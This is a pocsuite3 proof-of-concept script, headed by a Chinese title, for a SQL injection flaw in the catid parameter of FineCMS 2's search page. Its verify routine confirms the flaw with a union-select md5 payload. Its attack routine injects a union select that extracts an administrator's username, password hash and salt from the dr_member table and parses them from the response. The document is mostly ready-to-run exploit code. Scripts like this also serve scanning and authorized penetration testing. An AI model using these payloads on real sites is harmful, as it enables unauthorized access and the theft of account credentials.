finecms aip.php漏洞,Finecms 2 /models/search_model.php SQL注入漏洞

"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger

from pocsuite3.api import get_listener_ip, get_listener_port

from pocsuite3.api import REVERSE_PAYLOAD

from pocsuite3.lib.utils import random_str

from requests.exceptions import ReadTimeout

from urllib.parse import urljoin

import hashlib

import re

class DemoPOC(POCBase):

vulID = '1270' # ssvid

version = '1'

author = ['chenghs@knownsec.com']

vulDate = '2014-05-07'

createDate = '2014-05-19'

updateDate = '2014-05-19'

references = ['http://wooyun.org/bugs/wooyun-2014-059753']

name = 'Finecms 2 /models/search_model.php SQL注入漏洞 POC'

appPowerLink = 'http://dayrui.com'

appName = 'FineCMS'

appVersion = 'v2#'

vulType = 'SQL Injection'

desc = '''

models/Search_model.php 中 catid 参数未过滤带入 SQL

语句并执行，导致 SQL 注入漏洞，可以获取管理员的帐号

以及密码。

'''

samples = []

install_requires = ['']

def _verify(self):

result = {}

try:

vul_url = '/book/index.php?c=search&catid=-3'

flag = random_str()

payload = '%20union%20all%20select%20md5("{}")%23'.format(flag)

url = urljoin(self.url, vul_url+payload)

flag_md5 = hashlib.md5(flag.encode()).hexdigest()

resp = requests.get(url)

if resp.status_code == 200 and flag_md5 in resp.text:

result['VerifyInfo'] = {}

result['VerifyInfo']['URL'] = self.url

except Exception as e:

logger.error(str(e))

return self.parse_output(result)

def parse_output(self, result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('target is not vulnerable')

return output

def _attack(self):

result = {}

try:

vul_url = '/book/index.php?c=search&catid=-3'

payload = '%20union%20select%20concat(0x2d2d2d,username,0x3a3a,password,' \

'0x3a3a,salt,0x2d2d2d)%20from%20dr_member%20limit%200,1%23'

url = urljoin(self.url, vul_url+payload)

resp = requests.get(url)

if resp.status_code == 200:

res = re.findall('\(---(.*)::([\w\d]{32})::([\w\d]+)---\)', resp.text)

if res:

result['AdminInfo'] = {}

result['AdminInfo']['Username'] = res[0][0]

result['AdminInfo']['Password'] = '{}${}'.format(res[0][1], res[0][2])

elif resp.status_code == 500:

res = re.findall(', \'---(.*)::([\w\d]{32})::([\w\d]+)---\',', resp.text)

if res:

result['AdminInfo'] = {}

result['AdminInfo']['Username'] = res[0][0]

result['AdminInfo']['Password'] = '{}${}'.format(res[0][1], res[0][2])

except Exception as e:

logger.error(str(e))

return self.parse_output(result)

def _shell(self):

pass

register_poc(DemoPOC)